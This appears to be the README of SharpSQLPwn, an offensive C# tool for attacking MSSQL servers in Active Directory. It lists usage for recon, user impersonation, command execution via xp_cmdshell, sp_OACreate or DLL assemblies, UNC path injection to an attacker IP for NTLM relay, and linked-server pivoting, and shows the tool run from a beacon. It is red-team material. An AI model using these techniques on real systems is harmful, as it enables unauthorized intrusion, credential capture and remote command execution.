C# tool to identify and exploit weaknesses with MSSQL instances in Active Directory environments
.\SharpSQLPwn.exe /help
_____ __ _____ ____ __ ____
/ ___// /_ ____ __________ / ___// __ \ / / / __ \_ ______
\__ \/ __ \/ __ `/ ___/ __ \\__ \/ / / / / / / /_/ / | /| / / __ \
___/ / / / / /_/ / / / /_/ /__/ / /_/ / / /___/ ____/| |/ |/ / / / /
/____/_/ /_/\__,_/_/ / .___/____/\___\_\/_____/_/ |__/|__/_/ /_/
/_/
https://github.com/lefayjey/SharpSQLPwn
Author: lefayjey
Usage:
- Basic recon (Windows Authentication):
SharpSQLPwn.exe /modules:R /target:SQLServer [/auth:Windows] [/db:DatabaseName]
- Basic recon (Local Authentication):
SharpSQLPwn.exe /modules:R /target:SQLServer /auth:Local /user:Username /pass:Password [/db:DatabaseName]
- Basic recon (Azure Authentication):
SharpSQLPwn.exe /modules:R /target:SQLServer /auth:Azure /domain:Domain /user:Username /pass:Password[/db:DatabaseName]
- Impersonation:
SharpSQLPwn.exe /modules:I /target:SQLServer [/db:DatabaseName] /impuser:ImpersonatedUser
- Run Query (Optional: add module I to impersonate user before running query):
SharpSQLPwn.exe /modules:Q[I] /target:SQLServer [/db:DatabaseName] /query:CustomQuery [/impuser:ImpersonatedUser]
- Command Execution (Optional: add module I to impersonate user before command execution):
SharpSQLPwn.exe /modules:C[I] /target:SQLServer [/db:DatabaseName] /cmdtech:CmdExecTechnique /cmd:Command [/impuser:ImpersonatedUser]
- UNC Path Injection (Optional: add module I to impersonate user before path injection):
SharpSQLPwn.exe /modules:U[I] /target:SQLServer [/db:DatabaseName] /localIP:AttackerIP [/impuser:ImpersonatedUser]
- Linked Servers (Optional: add module C to execute command on linked SQL server, and module U to perform path injection, add module Q to run custom query):
SharpSQLPwn.exe /modules:L[CUQ] /target:SQLServer [/db:DatabaseName] /linkedsql:LinkedSQLServer [/cmdtech:CmdExecTechnique] [/cmd:Command] [/localIP:AttackerIP] [/query:CustomQuery]
- Interactive mode:
SharpSQLPwn.exe /interactive
Arguments:
/target - Target SQL server hostname or IP (default: LocalMachine)
/db - Database name of target SQL server (default: master)
/auth - Authention method (default: Windows)
Windows
Local (Requires /user:Username /pass:Password)
Azure (Requires /domain:Domain /user:Username /pass:Password)
/user - Username (for Local and Azure authentication methods)
/pass - Password (for Local and Azure authentication methods)
/domain - Domain (for Azure authentication method only)
/modules - Specify modules to run (default: R). Choose multiple modules by concatening letters, example: /modules:RI
R=Recon
I=Impersonation
Q=CustomQuery
C=CommandExecution
U=UNCPathInjection
L=LinkedSQL
/impuser - Name of user to impersonate (default: sa)
/query - Custom SQL query to run
/cmdtech - Specify execution technique (default: 1)
1=xp_cmdshell
2=sp_OACreate
3=dll_assembly
/cmd - Command to execute
/localIP - Local IP of the attacker (used for responder or ntlmrelay or Inveigh)
/linkedsql - Target linked SQL Server Hostname or IP
/interactive - Run Interactive version
/help - Show this help message
beacon> execute-assembly C:\path\to\SharpSQLPwn.exe
[*] Tasked beacon to run .NET program: SharpSQLPwn.exe
[+] host called home, sent: 151099 bytes
[+] received output:
_____ __ _____ ____ __ ____
/ ___// /_ ____ __________ / ___// __ \ / / / __ \_ ______
\__ \/ __ \/ __ `/ ___/ __ \\__ \/ / / / / / / /_/ / | /| / / __ \
___/ / / / / /_/ / / / /_/ /__/ / /_/ / / /___/ ____/| |/ |/ / / / /
/____/_/ /_/\__,_/_/ / .___/____/\___\_\/_____/_/ |__/|__/_/ /_/
/_/
https://github.com/lefayjey/SharpSQLPwn
Author: lefayjey
- ananth-she11z - AutoSQL
- skahwah - SQLRecon
Usage of SharpSQLPwn for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program. Only use for educational purposes.